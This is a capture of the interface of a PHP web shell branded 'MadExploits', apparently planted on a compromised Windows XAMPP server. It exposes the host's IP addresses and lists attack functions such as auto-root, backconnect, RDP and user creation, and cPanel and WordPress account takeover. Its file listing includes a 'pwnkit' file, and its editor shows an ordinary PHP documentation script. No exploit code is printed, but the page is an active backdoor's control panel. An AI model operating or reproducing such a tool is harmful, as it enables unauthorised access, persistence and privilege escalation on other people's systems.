Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 3.140.198.3
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
php /
tests /
parseFile /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
File_Find-1.3.0__Find.php
15.29
KB
-rw-rw-rw-
PackageUpdate.php
37.05
KB
-rw-rw-rw-
conditional.php
970
B
-rw-rw-rw-
empty.php
1
B
-rw-rw-rw-
ignore_functions_match.php
391
B
-rw-rw-rw-
math.php
85
B
-rw-rw-rw-
php5_method_chaining.php
912
B
-rw-rw-rw-
php5_method_chaining_samp2.php
590
B
-rw-rw-rw-
phpweb-entities.php
2.36
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
zip.php
446
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : phpweb-entities.php
<?php /* +----------------------------------------------------------------------+ | PHP Version 4 | +----------------------------------------------------------------------+ | Copyright (c) 1997-2008 The PHP Group | +----------------------------------------------------------------------+ | This source file is subject to version 3.0 of the PHP license, | | that is bundled with this package in the file LICENSE, and is | | available through the world-wide-web at the following url: | | http://www.php.net/license/3_0.txt. | | If you did not receive a copy of the PHP license and are unable to | | obtain it through the world-wide-web, please send a note to | | license@php.net so we can mail you a copy immediately. | +----------------------------------------------------------------------+ | Authors: Gabor Hojtsy <goba@php.net> | +----------------------------------------------------------------------+ $Id: phpweb-entities.php,v 1.1 2008/02/02 15:09:40 farell Exp $ */ set_time_limit(0); // Too few or too many parameters if ($argc != 3) { die("ERROR in " . __FILE__ . ": Too few or too many parameters"); } // Workdir is the first param $workdir = $argv[1]; // Whether we are in phpweb mode $phpweb_mode = ($argv[2] == "phpweb"); // Entity file for phpweb entities $phpweb_ent = "$workdir/entities/phpweb.ent"; // Automatically generated file note $autonote = "<!-- This file is autogenerated - don't touch it by hand! -->\n"; // Replace current phpweb.ent with a 0 byte file if (!$phpweb_mode) { $pe = fopen($phpweb_ent, "w"); fwrite($pe, $autonote); fclose($pe); echo "$phpweb_ent should be empty now...\n"; exit; } echo "creating $phpweb_ent...\n"; // Read in global.ent from the source dir $lines = file("@SRCDIR@/entities/global.ent"); // Collect all phpweb entities $phpweb_entities = array($autonote); foreach ($lines as $line) { if (strpos($line, "http://www.php.net") !== FALSE) { $phpweb_entities[] = str_replace("http://www.php.net", "", $line); } } // Write out entity file $pe = fopen($phpweb_ent, "w"); fwrite($pe, join("", $phpweb_entities)); fclose($pe);
Close